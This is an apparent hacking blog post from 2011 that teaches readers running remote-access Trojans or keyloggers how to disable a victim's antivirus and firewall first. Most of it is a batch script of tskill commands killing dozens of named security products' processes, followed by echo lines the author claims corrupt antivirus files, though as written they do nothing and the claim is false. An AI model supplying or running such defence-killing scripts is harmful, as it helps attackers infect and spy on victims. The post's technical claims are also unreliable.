Wednesday, March 2, 2011

2 things Before you attack your Victim



2 things before you Attack your victim! What’s that? When you using rat or any other key logger or Trojan, it’s get detected by Antivirus application or get blocked by Firewall. 

So we need make those application shutdowns before we attack.  How? There is various ways to make them shutdown. I personally prefer batch coding. There is application Win RAR, with that application you can make deadly combination of various batches. Today we will learn how to code those batches.

tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A offg*
 This batch will try to kill running process(antivirus).

echo %ProgramFiles%\alwils~1\avast4\*.* > nul
echo %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe > nul
echo %ProgramFiles%\kasper~1\*.exe > nul
echo %ProgramFiles%\trojan~1\*.exe > nul
echo %ProgramFiles%\f-prot95\*.dll > nul
echo %ProgramFiles%\tbav\*.dat > nul
echo %ProgramFiles%\avpersonal\*.vdf > nul
echo %ProgramFiles%\Norton~1\*.cnt > nul
echo %ProgramFiles%\Mcafee\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\*.* > nul
echo %ProgramFiles%\Norton~1\*.* > nul
echo %ProgramFiles%\avgamsr\*.exe > nul
echo %ProgramFiles%\avgamsvr\*.exe > nul
echo %ProgramFiles%\avgemc\*.exe > nul
echo %ProgramFiles%\avgcc\*.exe > nul
echo %ProgramFiles%\avgupsvc\*.exe > nul
echo %ProgramFiles%\grisoft\*.* > nul
echo %ProgramFiles%\nood32krn\*.exe > nul
echo %ProgramFiles%\nood32\*.exe > nul
echo %ProgramFiles%\nod32\*.* > nul
echo %ProgramFiles%\nood32 > nul
echo %ProgramFiles%\kav\*.exe > nul
echo %ProgramFiles%\kavmm\*.exe > nul
echo %ProgramFiles%\kaspersky\*.* > nul
echo %ProgramFiles%\ewidoctrl\*.exe > nul
echo %ProgramFiles%\guard\*.exe > nul
echo %ProgramFiles%\ewido\*.exe > nul
echo %ProgramFiles%\pavprsrv\*.exe > nul
echo %ProgramFiles%\pavprot\*.exe > nul
echo %ProgramFiles%\avengine\*.exe > nul
echo %ProgramFiles%\apvxdwin\*.exe > nul
echo %ProgramFiles%\webproxy\*.exe > nul
echo %ProgramFiles%\panda software\*.* > nul

This last part will attempt to corrupt various functions of antivirus applications and has the highest possibility of working if the service is stopped and the application is terminated. However if it did not kill the antivirus this part could stop it from working properly.

To be continue....

0 comments:

Post a Comment